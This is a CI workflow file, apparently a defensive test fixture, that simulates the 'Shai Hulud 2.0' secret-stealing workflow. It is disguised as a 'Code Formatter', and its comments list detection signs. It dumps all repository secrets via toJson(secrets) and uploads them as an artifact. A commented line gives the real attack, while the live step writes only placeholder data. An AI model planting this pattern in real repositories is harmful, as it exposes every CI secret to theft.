# Shai Hulud 2.0 - Secrets Exfiltration Workflow (formatter_*.yml)
# FOR DEFENSIVE SECURITY TESTING ONLY
#
# The malware creates this on a new branch to dump all repository secrets.
# After running, it downloads the artifact and deletes the workflow/branch.
#
# DETECTION:
# - toJson(secrets) in workflow files
# - Secrets uploaded as artifacts
# - Branch created then quickly deleted

name: Code Formatter

on:
  push:
    branches:
      - 'format-*'

jobs:
  format:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Collect Data
        env:
          # KEY EXFILTRATION - dumps ALL secrets
          ALL_SECRETS: ${{ toJson(secrets) }}
        run: |
          # Real attack: echo "$ALL_SECRETS" > actionsSecrets.json
          echo '{"simulated": true}' > actionsSecrets.json

      - name: Upload
        uses: actions/upload-artifact@v4
        with:
          name: format-results-${{ github.run_id }}
          path: actionsSecrets.json
          retention-days: 1
